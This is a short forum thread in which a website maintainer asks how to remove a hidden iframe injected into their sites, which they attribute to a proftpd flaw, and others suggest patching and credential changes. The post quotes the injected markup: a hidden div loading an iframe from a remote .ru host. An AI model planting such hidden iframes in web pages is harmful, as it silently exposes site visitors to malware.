Not sure if this is in the right place but anyway........

A load of sites i help maintain have been having code added to them.

<div style="display:none"><iframe width=438 height=168 src="http://deathtesting.  ru:8080/index.php" ></iframe></div>

normally with a load of random divs as well.

I have found out from a random lLithuanian site that this is a proftpd service vulnerability.

Google has flagged the sites and is displaying warnings that our site may contain malware.

Any ideas how to get rid of it?

We are currently changing our FTP and control panel codes and i will get rid of the code and reupload again and see if that works but is there anything else that can be done?

The sites are hosted on 1&1 if that makes any difference.

Have tried removing the code and re-uploading.

8 Years
Discussion Span
Last Post by kained

Until you can verify that the proftpd application has been patched you should disable it. The Fedora update for proftpd was published on the 24th. It may already be in place on your hosting service.


Thinks is okay now, just changed the FTP and control panel codes and reuploaded everything and it seems to be fine.


When you say you changed the FTP and control panel codes I am not sure what you mean. Did you mean you changed the passwords?

This question has already been answered. Start a new discussion instead.
Have something to contribute to this discussion? Please be thoughtful, detailed and courteous, and be sure to adhere to our posting rules.